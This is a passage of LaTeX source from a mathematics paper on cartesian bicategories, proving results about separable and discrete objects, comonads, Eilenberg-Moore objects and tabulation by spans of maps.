adjunction $d_{A\otimes B}\dashv d^*_{A\otimes B}$ with unit
$\eta_{d_{A\otimes B}}$ (via middle-four interchange) shows that the separable
objects are closed under binary products. On the other hand, $d_I$ is an
equivalence so that $I$ is also separable.
\frp
\cor\label{eos}
For a cartesian bicategory, the full subbicategory determined by
the separable objects is a cartesian bicategory which satisfies the axiom
{\em Separable}.
\frp
\eth
\prp\label{ordhom}
If $A$ is a separable object in a cartesian bicategory $\mathbf{B}$,
then, for all $X$ in $\mathbf{B}$, the hom-category $\mathbf{M}(X,A)$ is an ordered
set, meaning that the category structure forms a reflexive,
transitive relation.
\eth
\prf
Suppose that we have arrows $\alpha,\beta{\kern -.25em}:{\kern -.25em} g{\scalefactor{0.5} \two}f$ in
$\mathbf{M}(X,A)$. In $\mathbf{B}(X,A)$ we have
$$\bfig
\Atriangle(0,0)/->`->`/[g`f`f;\alpha`\beta`]
\morphism(500,500)|m|<0,-500>[g`f\wedge f;\gamma]
\morphism(500,0)|b|<-500,0>[f\wedge f`f;\pi]
\morphism(500,0)|b|<500,0>[f\wedge f`f;\rho]
\efig$$
By Proposition \ref{sepmeans} we can take $f\wedge f =f$ and
$\pi=1_f=\rho$ so that we have $\alpha=\gamma=\beta$. It follows
that $\mathbf{M}(X,A)$ is an ordered set.
\frp
\dfn\label{discrete}
An object $A$ in a cartesian bicategory is said to be
{\em discrete} if it is both Frobenius and separable. We write
$\mathrm{Dis}\mathbf{B}$ for the full subbicategory of $\mathbf{B}$ determined
by the discrete objects.
\eth
\begin{remark}
Beware that this is quite different to the notion of discreteness in a bicategory.
An object $A$ of a bicategory is discrete if each hom-category $\mathbf{B}(X,A)$ is
discrete; $A$ is essentially discrete if each $\mathbf{B}(X,A)$ is equivalent to a discrete category. The notion of discreteness for cartesian bicategories defined above turns out to mean
that $A$ is essentially discrete in the bicategory $\mathrm{Map}\mathbf{B}$.
\end{remark}
From Proposition \ref{sepclofin} above and Proposition 3.4 of \cite{ww}
we immediately have
\prp\label{eod}
For a cartesian bicategory $\mathbf{B}$, the full subbicategory
$\mathrm{Dis}\mathbf{B}$ of discrete objects is a cartesian bicategory in which
every object is discrete.
\frp
\eth
And from Proposition \ref{ordhom} above and Theorem 3.13 of \cite{ww}
we have
\prp\label{dishom}
If $A$ is a discrete object in a cartesian bicategory $\mathbf{B}$
then, for all $X$ in $\mathbf{B}$, the hom category $\mathbf{M}(X,A)$ is an
equivalence relation.
\frp
\eth
If both the {\em Frobenius} axiom of \cite{ww}
and the {\em Separable} axiom of this paper hold for our cartesian
bicategory $\mathbf{B}$, then every object of $\mathbf{B}$ is discrete. In
this case, because $\mathbf{M}$ is a bicategory, the equivalence relations
$\mathbf{M}(X,A)$ are stable under composition from both sides. Thus
writing $|\mathbf{M}(X,A)|$ for the set of objects of $\mathbf{M}(X,A)$ we have
a mere category, ${\cal E}$ whose objects are those
of $\mathbf{M}$ (and hence also those of $\mathbf{B}$) and whose hom sets are
the quotients $|\mathbf{M}(X,A)|/\mathbf{M}(X,A)$. If the ${\cal E}(X,A)$
are regarded as discrete categories, so that ${\cal E}$ is a locally
discrete bicategory then the functors
$\mathbf{M}(X,A){\,\s\to}\, |\mathbf{M}(X,A)|/\mathbf{M}(X,A)$ constitute the effect on homs functors
for an identity on objects biequivalence $\mathbf{M}{\,\s\to}\, {\cal E}$. To summarize
\thm\label{odibld} If a cartesian bicategory $\mathbf{B}$ satisfies both the Frobenius
and Separable axioms then the bicategory of maps $\mathbf{M}$ is
biequivalent to the locally discrete bicategory ${\cal E}$. \frp
\eth
In the following lemma we show that any copointed endomorphism of a discrete
object can be made into a comonad; later on, we shall see that this comonad
structure is in fact unique.
\lem\label{diag} If $A$ is a discrete object in a
cartesian bicategory $\mathbf{B}$ then, for any copointed endomorphism arrow
$\epsilon{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, 1_A{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$, there is a 2-cell
$\delta=\delta_G{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, GG$
satisfying
$$\bfig
\Atriangle(0,0)/->`->`/[G`G`G;1`1`]
\morphism(500,500)|m|<0,-500>[G`GG;\delta]
\morphism(500,0)|b|<-500,0>[GG`G;G\epsilon]
\morphism(500,0)|b|<500,0>[GG`G;\epsilon G]
\efig$$
and if both $G,H{\kern -.25em}:{\kern -.25em} A{\s\two} A$ are copointed, so that $GH{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$
is also copointed, and $\phi{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, H$ is any 2-cell, then the
$\delta$'s satisfy
$$\bfig
\square(0,0)[G`H`GG`HH;\phi`\delta`\delta`\phi\phi]
\place(1000,0)[\mbox{and}]
\Atriangle(1500,0)/<-`->`->/%
[GHGH`GH`GH;\delta`(G\epsilon)(\epsilon H)`1]
\efig$$
\eth
\prf
We define $\delta=\delta_G$ to be the pasting composite
$$\bfig
\qtriangle(0,0)|amm|[A`AA`AAA;d`d_3`1d]
\square(500,0)|amma|[AA`AA`AAA`AAA;G1`1d`1d`G11]
\square(1000,0)|amma|[AA`A`AAA`AA;d^*`1d`d`d^*1]
\qtriangle(500,-500)|abr|[AAA`AAA`AAA;G11`GGG`11G]
\square(1000,-500)|arma|[AAA`AA`AAA`AA;d^*1`11G`1G`d^*1]
\qtriangle(1000,-1000)|amm|[AAA`AA`A;d^*1`d_3^*`d^*]
\morphism(0,500)|b|/{@{->}@/_4em/}/<1500,-1500>[A`A;G\wedge G\wedge G]
\morphism(0,500)|b|/{@{->}@/_8em/}/<1500,-1500>[A`A;G]
\morphism(0,500)|a|/{@{->}@/^3em/}/<1500,0>[A`A;G]
\morphism(1500,500)|r|/{@{->}@/^3em/}/<0,-1500>[A`A;G]
\morphism(800,-250)|m|<150,150>[`;G\epsilon G]
\morphism(300,-800)|m|<150,150>[`;\delta_3]
\place(1250,250)[1]
\place(750,675)[2]
\place(1700,-250)[3]
\place(750,250)[4]
\place(1250,-250)[5]
\place(600,-450)[6]
\efig$$
wherein $\otimes$ has been abbreviated by juxtaposition and all
subregions not explicitly inhabited by a 2-cell are deemed to
be inhabited by the obvious invertible 2-cell. A reference number has been
assigned to those invertible 2-cells which arise from the hypotheses.
As in \cite{ww}, $d_3$'s denote 3-fold diagonal maps and, similarly,
we write $\delta_3$ for a local 3-fold diagonal.
The invertible 2-cell labelled by `1' is that defining $A$ to be
Frobenius. The 3-fold composite of arrows in the region labelled
by `2' is $G\wedge1_A$ and, similarly, in that labelled by `3' we have
$1_A\wedge G$. Each of these is isomorphic to $G$ because $A$ is
separable and $G$ is copointed. The isomorphisms in `4' and `5'
express the pseudo-functoriality of $\otimes$ in the cartesian bicategory
$\mathbf{B}$. Finally `6' expresses the ternary local product in terms of
the ternary $\otimes$ as in \cite{ww}. Demonstration of the equations is
effected easily by pasting composition calculations.
\frp
\thm\label{wedge=.} If $G$ and $H$ are copointed endomorphisms
on a discrete $A$ in a cartesian $\mathbf{B}$ then
$$G\toleft^{G\epsilon}GH\to^{\epsilon H}H$$
is a product diagram in $\mathbf{B}(A,A)$.
\eth
\prf
If we are given $\alpha{\kern -.25em}:{\kern -.25em} K{\,\s\to}\, G$ and $\beta{\kern -.25em}:{\kern -.25em} K{\,\s\to}\, H$ then $K$ is
also copointed and we have
$$K\to^\delta KK\to^{\alpha\beta}GH$$
as a candidate pairing. That this candidate satisfies the universal
property follows from the equations of Lemma \ref{diag} which
are precisely those in the equational description of binary products.
We remark that the `naturality' equations for the projections follow
immediately from uniqueness of copoints.
\frp
\cor\label{comsim} If $A$ is discrete in a cartesian $\mathbf{B}$, then an endo-arrow
$G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ admits a comonad structure if and only if $G$ has
the copointed property, and any such comonad structure is unique.
\eth
\prf
The Theorem shows that the arrow $\delta{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, GG$ constructed in Lemma
\ref{diag} is the product diagonal on $G$ in the category $\mathbf{B}(A,A)$ and,
given $\epsilon{\kern -.25em}:{\kern -.25em} G{\,\s\to}\, 1_A$, this is the only comonad comultiplication on $G$.
\frp
\rmk
It is clear that $1_A$ is terminal with respect to the copointed
objects in $\mathbf{B}(A,A)$.
\eth
\prp\label{subterm} If an object $B$ in a bicategory $\mathbf{B}$ has $1_B$
subterminal in $\mathbf{B}(B,B)$ then, for any map $f{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, B$, $f$ is subterminal in $\mathbf{B}(A,B)$ and $f^*$ is subterminal in $\mathbf{B}(B,A)$. In particular, in a
cartesian bicategory in which every object is separable, every adjoint
arrow is subterminal.
\eth
\prf
Precomposition with a map preserves terminal objects and monomorphisms,
as does postcomposition with a right adjoint.
\frp
\section{Bicategories of Comonads}\label{Coms}
The starting point of this section is the observation, made in the introduction,
that a comonad in the bicategory $\mathrm{Span}\,{\cal E}$ is
precisely a span of the form
$$A \xleftarrow{g} X \xrightarrow{g} A$$
in which both legs are equal.
We will write $\mathbf{C}=\mathrm{Com}\mathbf{B}$ for the bicategory of comonads in $\mathbf{B}$,
$\mathrm{Com}$ being one of the duals of Street's construction $\mathrm{Mnd}$
in \cite{ftm}. Thus $\mathbf{C}$ has objects given by the comonads $(A,G)$
of $\mathbf{B}$. The structure 2-cells for comonads will be denoted
$\epsilon=\epsilon_G$, for counit and $\delta=\delta_G$, for
comultiplication. An arrow
in $\mathbf{C}$ from $(A,G)$ to $(B,H)$ is a pair $(F,\phi)$ as shown in
$$\bfig
\square(0,0)[A`B`A`B;F`G`H`F]
\morphism(125,250)|a|<250,0>[`;\phi]
\efig$$
satisfying
\begin{equation}\label{comarrow}
\bfig
\square(0,0)[FG`HF`F1_A`1_BF;\phi`F\epsilon`\epsilon F`=]
\place(1000,250)[\mbox{and}]
\square(1500,0)/`->``->/[FG``FGG`HFG;`F\delta``\phi G]
\square(2000,0)/``->`->/[`HF`HFG`HHF;``\delta F`H\phi]
\morphism(1500,500)<1000,0>[FG`HF;\phi]
\efig
\end{equation}
(where, as often, we have suppressed the associativity constraints of
our normal, cartesian, bicategory $\mathbf{B}$).
A 2-cell $\tau{\kern -.25em}:{\kern -.25em}(F,\phi){\,\s\to}\,(F',\phi'){\kern -.25em}:{\kern -.25em}(A,G){\,\s\to}\,(B,H)$ in $\mathbf{C}$
is a 2-cell $\tau{\kern -.25em}:{\kern -.25em} F{\,\s\to}\, F'$ in $\mathbf{B}$ satisfying
\begin{equation}\label{comtrans}
\bfig
\square(0,0)[FG`HF`F'G`HF';\phi`\tau G`H\tau`\phi']
\efig
\end{equation}
There is a pseudofunctor $I{\kern -.25em}:{\kern -.25em}\mathbf{B}{\,\s\to}\,\mathbf{C}$ given by
$$I(\tau{\kern -.25em}:{\kern -.25em} F{\,\s\to}\, F'{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, B)=%
\tau{\kern -.25em}:{\kern -.25em} (F,1_{F}){\,\s\to}\, (F',1_{F'}){\kern -.25em}:{\kern -.25em} (A,1_A){\,\s\to}\, (B,1_B)$$
From \cite{ftm} it is well known that a bicategory $\mathbf{B}$
has Eilenberg-Moore objects for comonads
if and only if $I{\kern -.25em}:{\kern -.25em}\mathbf{B}{\,\s\to}\,\mathbf{C}$ has a right biadjoint, which we will
denote by $E{\kern -.25em}:{\kern -.25em}\mathbf{C}{\,\s\to}\,\mathbf{B}$. We write $E(A,G)=A_G$ and the counit
for $I\dashv E$ is denoted by
$$\bfig
\square(0,0)[A_G`A`A_G`A;g_G`1_{A_G}`G`g_G]
\morphism(125,250)|a|<250,0>[`;\gamma_G]
\Ctriangle(2500,0)/<-`->`->/<500,250>[A`A_G`A;g_G`G`g_G]
\place(1500,250)[\mbox{ or, using normality of $\mathbf{B}$, better by }]
\morphism(2700,250)|m|<200,0>[`;\gamma_G]
\efig$$
with $(g_G,\gamma_G)$ abbreviated to $(g,\gamma)$ when there is
no danger of confusion. It is standard that each $g=g_G$ is necessarily
a map (whence our lower case notation) and the mate $gg^*{\,\s\to}\, G$ of
$\gamma$ is an isomorphism which identifies $\epsilon_g$ and
$\epsilon_G$.
We will write $\mathbf{D}$ for the locally full subbicategory
of $\mathbf{C}$ determined by all the objects and those arrows of the form $(f,\phi)$,
where $f$ is a map, and write $j{\kern -.25em}:{\kern -.25em}\mathbf{D}{\,\s\to}\,\mathbf{C}$ for the inclusion.
It is clear that the
pseudofunctor $I{\kern -.25em}:{\kern -.25em}\mathbf{B}{\,\s\to}\,\mathbf{C}$ restricts to give a pseudofunctor
$J{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{D}$. We say that the bicategory $\mathbf{B}$ {\em has Eilenberg-Moore
objects for comonads, as seen by $\mathbf{M}$}, if $J{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{D}$ has a right
biadjoint. (In general, this property does not follow from that of
Eilenberg-Moore objects for comonads.)
\begin{remark}\label{rmk:D-for-dummies}
In the case $\mathbf{B}=\mathrm{Span}\,{\cal E}$, a comonad in $\mathbf{B}$ can, as we have seen, be
identified with a morphism in {\cal E}. This can be made into the object part of a
biequivalence between the bicategory $\mathbf{D}$ and the category ${\cal E}^\mathbf{2}$
of arrows in ${\cal E}$. If we further identify $\mathbf{M}$ with ${\cal E}$, then the
inclusion $j:\mathbf{D}\to\mathbf{C}$ becomes the diagonal ${\cal E}\to{\cal E}^\mathbf{2}$; of course this
does have a right adjoint, given by the domain functor.
\end{remark}
\thm\label{simcom} If $\mathbf{B}$ is a cartesian bicategory in which every object
is discrete, the bicategory $\mathbf{D}=\mathbf{D}(\mathbf{B})$ admits the following simpler
description:
\begin{enumerate}
\item[$i)$] An object is a pair $(A,G)$ where $A$ is an object of $\mathbf{B}$
and $G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ admits a copoint;
\item[$ii)$] An arrow $(f,\phi){\kern -.25em}:{\kern -.25em}(A,G){\,\s\to}\,(B,H)$ is a map $f{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, B$ and
a 2-cell $\phi{\kern -.25em}:{\kern -.25em} fG{\,\s\to}\, Hf$;
\item[$iii)$] A 2-cell $\tau{\kern -.25em}:{\kern -.25em}(f,\phi){\,\s\to}\,(f',\phi'){\kern -.25em}:{\kern -.25em}(A,G){\,\s\to}\,(B,H)$ is
a 2-cell satisfying $\tau{\kern -.25em}:{\kern -.25em} f{\,\s\to}\, f'$ satisfying equation (\ref{comtrans}).
\end{enumerate}
\eth
\prf
We have i) by Corollary \ref{comsim} while iii) is precisely the description
of a 2-cell in $\mathbf{D}$, modulo the description of the domain and codomain
arrows. So, we have only to show ii), which is to show that the equations
(\ref{comarrow}) hold automatically under the hypotheses. For the first
equation of (\ref{comarrow}) we have uniqueness of any 2-cell $fG{\,\s\to}\, f$
because $f$ is subterminal by Proposition \ref{subterm}. For the second,
observe that the terminating vertex, $HHf$, is the product $Hf\wedge Hf$
in $\mathbf{M}(A,B)$ because $HH$ is the product $H\wedge H$ in $\mathbf{M}(B,B)$ by
Theorem~\ref{wedge=.} and precomposition with a map preserves all limits.
For $HHf$ seen as a product, the projections are, again
by Theorem~\ref{wedge=.}, $H\epsilon f$ and $\epsilon Hf$. Thus, it
suffices to show that the diagram for the second equation commutes when
composed with both $H\epsilon f$ and $\epsilon Hf$. We have
$$\bfig
\square(0,0)/`->``->/[fG``fGG`HfG;`f\delta``\phi G]
\square(500,0)/``->`->/[`Hf`HfG`HHf;``\delta f`H\phi]
\morphism(0,500)<1000,0>[fG`Hf;\phi]
\qtriangle(500,-500)|blr|[HfG`HHf`Hf;H\phi`Hf\epsilon`H\epsilon f]
\morphism(0,-500)|b|<1000,0>[fG`Hf;\phi]
\morphism(0,0)<0,-500>[fGG`fG;fG\epsilon]
\square(2000,0)/`->``->/[fG``fGG`HfG;`f\delta``\phi G]
\square(2500,0)/``->`->/[`Hf`HfG`HHf;``\delta f`H\phi]
\morphism(2000,500)<1000,0>[fG`Hf;\phi]
\ptriangle(2000,-500)|blr|[fGG`HfG`fG;\phi G`f\epsilon G`\epsilon fG]
\morphism(2000,-500)|b|<1000,0>[fG`Hf;\phi]
\morphism(3000,0)|r|<0,-500>[HHf`Hf;\epsilon Hf]
\efig$$
in which each of the lower triangles commutes by the first equation of
(\ref{comarrow}) already established. Using comonad equations for
$G$ and $H$, it is obvious that each composite is $\phi$.
\frp
Finally, let us note that $\mathbf{D}$ is
a subbicategory, neither full nor locally full, of the Grothendieck
bicategory $\mathbf{G}$ and write $K{\kern -.25em}:{\kern -.25em}\mathbf{D}{\,\s\to}\,\mathbf{G}$ for the inclusion. We also
write $\iota{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{G}$
for the composite pseudofunctor $KJ$. Summarizing, we have introduced
the following commutative diagram of bicategories and pseudofunctors
$$\bfig
\square(0,0)[\mathbf{M}`\mathbf{D}`\mathbf{B}`\mathbf{C};J`i`j`I]
\morphism(500,500)<500,0>[\mathbf{D}`\mathbf{G};K]
\morphism(0,500)|a|/{@{->}@/^2em/}/<1000,0>[\mathbf{M}`\mathbf{G};\iota]
\efig ;$$
note also that in our main case of interest $\mathbf{B}=\mathrm{Span}\,{\cal E}$, each of $\mathbf{M}$,
$\mathbf{D}$, and $\mathbf{G}$ is biequivalent to a mere category.
Ultimately, we are interested in having a right biadjoint,
say $\tau$, of $\iota$. For such a biadjunction $\iota\dashv\tau$
the counit at an object $R{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathbf{G}$ will take the form
\begin{equation}\label{tabcounit}
\bfig
\Ctriangle/<-`->`->/<500,250>[X`\tau R`A;u_R`R`v_R]
\morphism(200,250)|m|<200,0>[`;\omega_R]
\efig
\end{equation}
(where, as for a biadjunction $I\dashv E{\kern -.25em}:{\kern -.25em}\mathbf{C}{\,\s\to}\,\mathbf{B}$, a
triangle rather than a square can be taken as the boundary of
the 2-cell by the normality of $\mathbf{B}$). In fact, we are interested
in the case where we have $\iota\dashv\tau$ and moreover the counit
components $\omega_R{\kern -.25em}:{\kern -.25em} v_R{\,\s\to}\, Ru_R$ enjoy the property that their
mates $v_Ru^*_R{\,\s\to}\, R$ with respect to the adjunction $u_R\dashv u^*_R$
are invertible. In this way we represent a general arrow of $\mathbf{B}$
in terms of a span of maps. Since biadjunctions compose we will
consider adjunctions $J\dashv F$ and $K\dashv G$ and we begin with the
second of these.
\thm\label{G(R)}
For a cartesian bicategory $\mathbf{B}$ in which every object is discrete,
there is an adjunction $K\dashv G{\kern -.25em}:{\kern -.25em}\mathbf{G}{\,\s\to}\,\mathbf{D}$ where, for
$R{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathbf{G}$, the comonad $G(R)$ and its witnessing copoint
$\epsilon{\kern -.25em}:{\kern -.25em} G(R){\,\s\to}\, 1_{XA}$ are given by the left diagram below and the
counit $\mu{\kern -.25em}:{\kern -.25em} KG(R){\,\s\to}\, R$ is given by the right diagram below,
all in notation suppressing $\otimes$:
$$\bfig
\ptriangle(-1500,1000)/->`->`<-/[XA`XA`XXA;1_{XA}`dA`p_{1,3}]
\morphism(-1400,1350)|a|<150,0>[`;\simeq]
\morphism(-1500,1000)|l|<0,-500>[XXA`XAA;XRA]
\morphism(-1000,1500)|r|<0,-1500>[XA`XA;1_{XA}]
\morphism(-1375,750)|m|<250,0>[`;\tilde p_{1,3}]
\btriangle(-1500,0)[XAA`XA`XA;Xd^*`p_{1,3}`1_{XA}]
\morphism(-1400,150)|a|<150,0>[`;]
\morphism(-1500,1500)|l|/{@{->}@/_3.5em/}/<0,-1500>[XA`XA;G(R)]
\ptriangle(0,1000)/->`->`<-/[XA`X`XXA;p`dA`p_2]
\morphism(0,1000)|l|<0,-500>[XXA`XAA;XRA]
\morphism(500,1500)|r|<0,-1500>[X`A;R]
\btriangle(0,0)[XAA`XA`A;Xd^*`p_2`r]
\morphism(100,1350)|a|<150,0>[`;\simeq]
\morphism(125,750)|m|<250,0>[`;\tilde p_2]
\morphism(100,150)|b|<150,0>[`;]
\morphism(0,1500)|l|/{@{->}@/_3.5em/}/<0,-1500>[XA`XA;G(R)]
\efig$$
Moreover, the mate $rG(R)p^*{\,\s\to}\, R$ of the counit $\mu$ is invertible.
In the left diagram, the $p_{1,3}$ collectively denote projection from the
three-fold product in $\mathbf{G}$ to the product of the first and third factors.
In the right diagram, the $p_2$ collectively denote projection from the
three-fold product in $\mathbf{G}$ to the second factor. The upper triangles of the
two diagrams are the canonical isomorphisms. The lower left triangle
is the mate of the canonical isomorphism $1{\scalefactor{0.5} \to^{\simeq}}p_{1,3}(Xd)$.
The lower right triangle is the mate of the canonical isomorphism
$r{\scalefactor{0.5} \to^{\simeq}} p_2(Xd)$.
\eth
\prf Given a comonad $H{\kern -.25em}:{\kern -.25em} T{\,\s\to}\, T$ and an arrow
$$\bfig
\square(0,0)[T`X`T`A;x`H`R`a]
\morphism(125,250)|a|<250,0>[`;\psi]
\efig$$
in $\mathbf{G}$, we verify the adjunction claim by showing that there is
a unique arrow
$$\bfig
\square(0,0)[T`XA`T`XA;f`H`G(R)`f]
\morphism(125,250)|a|<250,0>[`;\phi]
\efig$$
in $\mathbf{D}$, whose composite with the putative counit $\mu$ is
$(x,\psi,a)$. It is immediately clear that the unique solution
for $f$ is $(x,a)$ and to give $\phi{\kern -.25em}:{\kern -.25em}(x,a)H{\,\s\to}\, Xd^*(XRA)dA(x,a)$
is to give the mate $Xd(x,a)H{\,\s\to}\, (XRA)dA(x,a)$ which is
$(x,a,a)H{\,\s\to}\, (XRA)(x,x,a)$ and can be seen as
a $\mathbf{G}$ arrow:
$$\bfig
\square(0,0)[T`XXA`T`XAA;(x,x,a)`H`XRA`(x,a,a)]
\morphism(125,250)|a|<250,0>[`;(\alpha,\beta,\gamma)]
\efig$$
where we exploit the description of products in $\mathbf{G}$. From this
description it is clear, since $\tilde p_2(\alpha,\beta,\gamma)=\beta$
as a composite in $\mathbf{G}$, that the unique solution for $\beta$ is
$\psi$. We have seen in Theorem \ref{comsim} that the conditions
(\ref{comarrow}) hold automatically in $\mathbf{D}$ under the assumptions
of the Theorem. From the first of these we have:
$$\bfig
\square(0,0)|almb|[T`XXA`T`XAA;(x,x,a)`H`XRA`(x,a,a)]
\morphism(125,250)|a|<250,0>[`;(\alpha,\beta,\gamma)]
\square(500,0)|amrb|[XXA`XA`XAA`XA;p_{1,3}`XRA`1_{XA}`p_{1,3}]
\morphism(625,250)|a|<250,0>[`;p_{1,3}]
\place(1375,250)[=]
\square(2000,0)|arrb|[T`XA`T`XA;(x,a)`1_T`1_{XA}`(x,a)]
\morphism(2125,250)|a|<250,0>[`;\kappa_{(x,a)}]
\morphism(2000,500)|l|/{@{->}@/_3em/}/<0,-500>[T`T;H]
\morphism(1750,250)|a|<200,0>[`;\epsilon_H]
\efig$$
So, with a mild abuse of notation, we have
$(\alpha,\gamma)=(1_x\epsilon_H, 1_a\epsilon_H)$, uniquely,
and thus the unique solutions for $\alpha$ and $\gamma$ are
$1_x\epsilon_H$ and $1_a\epsilon_H$ respectively. This shows that
$\phi$ is necessarily the mate under the adjunctions considered of
$(1_x\epsilon_H,\psi,1_a\epsilon_H,)$. Since $\mathbf{D}$ and $\mathbf{G}$
are essentially locally discrete this suffices to
complete the claim that $K\dashv G$.
It only remains to show that the mate $rG(R)p^*{\,\s\to}\, R$ of the counit
$\mu$ is invertible. In the three middle squares of the diagram
$$\bfig
\morphism(0,500)|l|/{@{->}@/_3.5em/}/<0,-1500>[XA`XA;G(R)]
\square(0,0)|alrm|/<-`->`->`<-/[XA`X`XXA`XX;p^*`dA`d`p^*]
\morphism(125,250)|a|<250,0>[`;\tilde p^*_{d,1_A}]
\square(0,-500)|mlmm|/<-`->`->`<-/[XXA`XX`XAA`XA;p^*`XRA`XR`p^*]
\morphism(125,-250)|a|<250,0>[`;\tilde p^*_{XR,1_A}]
\square(0,-1000)|mlrb|/<-`->`->`->/[XAA`XA`XA`A;p^*`Xd^*`r`r]
\morphism(175,-750)|a|<150,0>[`;\simeq]
\square(500,-500)|amrb|[XX`X`XA`A;r`XR`R`r]
\morphism(625,-250)|a|<250,0>[`;r_{1_X,R}]
\morphism(500,500)|r|<500,-500>[X`X;1_X]
\morphism(1000,-500)|r|<-500,-500>[A`A;1_A]
\efig$$
the top two are invertible 2-cells by
Proposition 4.18 of \cite{ckww} while the lower one is the obvious invertible
2-cell constructed from $Xd^*p^*\iso1_{X,A}$. The right square is an
invertible 2-cell by Proposition 4.17 of \cite{ckww}. This shows that the
mate $rG(R)p^*{\,\s\to}\, R$ of $\mu$ is
invertible.
\frp
\rmk \label{unit} It now follows that the unit of the adjunction $K\dashv G$
is given (in notation suppressing $\otimes$) by:
$$\bfig
\qtriangle(1500,1000)[T`TT`TTT;d`d_3`dT]
\dtriangle(1500,0)/<-`->`->/[TTT`T`TT;d_3`Td^*`d]
\morphism(1500,1500)|l|<0,-1500>[T`T;H]
\morphism(2000,1000)|l|<0,-500>[TTT`TTT;HHH]
\morphism(2000,1000)|r|/{@{->}@/^3em/}/<0,-500>[TTT`TTT;THT]
\morphism(1750,1350)|a|<150,0>[`;\simeq]
\morphism(1550,750)|m|<175,0>[`;\tilde d_3]
\morphism(2050,750)|m|<225,0>[`;\epsilon H\epsilon]
\morphism(1750,150)|a|<150,0>[`;\simeq]
\efig$$
where the $d_3$ collectively denote 3-fold diagonalization $(1,1,1)$ in $\mathbf{G}$.
The top triangle is a canonical isomorphism while the lower triangle
is the mate of the canonical isomorphism $(T\otimes d)d{\scalefactor{0.5} \to^{\simeq}}d_3$
and is itself invertible, by separability of $T$.
\eth
Before turning to the question of an adjunction $J\dashv F$, we note:
\lem\label{maplikeanm}
In a cartesian bicategory in which Maps are Comonadic,
if $gF\cong h$ with $g$ and $h$ maps, then $F$ is also a map.
\eth
\prf
By Theorem 3.11 of \cite{ww} it suffices to show that $F$ is
a comonoid homomorphism, which is to show that the
canonical 2-cells $\tilde t_F{\kern -.25em}:{\kern -.25em} tF{\,\s\to}\, t$ and $\tilde d_F{\kern -.25em}:{\kern -.25em} dF{\,\s\to}\,(F\otimes F)d$
are invertible. For the first we have:
$$tF\cong tgF\cong th\cong t$$
Simple diagrams show that we do get the right isomorphism
in this case and also for the next:
$$(g\otimes g)(dF)\cong dgF\cong dh\cong(h\otimes h)d\cong (g\otimes g)(F\otimes F)d$$
which gives $dF\cong(F\otimes F)d$ since the map $g\otimes g$ reflects
isomorphisms.
\frp
\thm\label{emasbm} If $\mathbf{B}$ is a cartesian bicategory which has
Eilenberg-Moore objects for Comonads and for which Maps are Comonadic
then $\mathbf{B}$ has Eilenberg-Moore objects for Comonads as Seen by $\mathbf{M}$,
which is to say that $J{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{D}$ has a right adjoint. Moreover, the counit
for the adjunction, say $JF{\,\s\to}\, 1_{\mathbf{D}}$, necessarily having components
of the form $\gamma{\kern -.25em}:{\kern -.25em} g{\,\s\to}\, Gg$ with $g$ a map, has $gg^*{\,\s\to}\, G$ invertible.
\eth
\prf
It suffices to show that the adjunction $I\dashv E{\kern -.25em}:{\kern -.25em}\mathbf{C}{\,\s\to}\,\mathbf{B}$
restricts to $J\dashv F{\kern -.25em}:{\kern -.25em}\mathbf{D}{\,\s\to}\,\mathbf{M}$. For this it suffices to show that,
given $(h,\theta){\kern -.25em}:{\kern -.25em} JT{\,\s\to}\,(A,G)$, the $F{\kern -.25em}:{\kern -.25em} T{\,\s\to}\, A_G$ with $gF\cong h$
which can be found using $I\dashv E$ has $F$ a map. This follows from
Lemma \ref{maplikeanm}.
\frp
\thm\label{tabulation} A cartesian bicategory which has Eilenberg-Moore
objects for Comonads and for which Maps are Comonadic has tabulation in
the sense that the inclusion $\iota{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{G}$ has a right adjoint $\tau$
and the counit components $\omega_R{\kern -.25em}:{\kern -.25em} v_R{\,\s\to}\, Ru_R$ as in (\ref{tabcounit})
have the property that the mates $v_Ru^*_R{\,\s\to}\, R$, with respect to the
adjunctions $u_R\dashv u^*_R$, are invertible.
\eth
\prf
Using Theorems \ref{G(R)} and \ref{emasbm} we can construct the adjunction
$\iota\dashv\tau$ by composing $J\dashv F$ with $K\dashv G$. Moreover, the
counit for $\iota\dashv\tau$ is the pasting composite:
$$\bfig
\Ctriangle(0,0)|lmb|/<-`->`->/<500,250>[X\otimes A`T`X\otimes A;(u,v)`G(R)`(u,v)]
\morphism(0,250)|l|/{@{->}@/^4.0em/}/<1000,250>[T`X;u]
\morphism(0,250)|l|/{@{->}@/_4.0em/}/<1000,-250>[T`A;v]
\morphism(300,160)|m|<0,180>[`;\gamma]
\square(500,0)|amrb|<500,500>[X\otimes A`X`X\otimes A`A;p`G(R)`R`r]
\morphism(650,250)|m|<200,0>[`;\mu]
\efig$$
where the square is the counit for $K\dashv G$; and the triangle, the counit
for $J\dashv F$, is an Eilenberg-Moore coalgebra for the comonad $G(R)$.
The arrow component of the Eilenberg-Moore coalgebra is necessarily of
the form $(u,v)$, where $u$ and $v$ are maps, and it also follows that
we have $(u,v)(u,v)^*\cong G(R)$. Thus we have
$$vu^*\cong r(u,v)(p(u,v))^*\cong r(u,v)(u,v)^*p^*\cong rG(R)p^*\cong R$$
where the first two isomorphisms are trivial, the third arises from the
invertibility of the mate of $\gamma$ as an Eilenberg-Moore structure,
and the fourth is invertibility of $\mu$, as in Theorem \ref{G(R)}.
\frp
\thm\label{mapbhaspb}
For a cartesian bicategory $\mathbf{B}$ with Eilenberg-Moore objects for
Comonads and for which Maps are Comonadic, $\mathrm{Map}\mathbf{B}$ has pullbacks
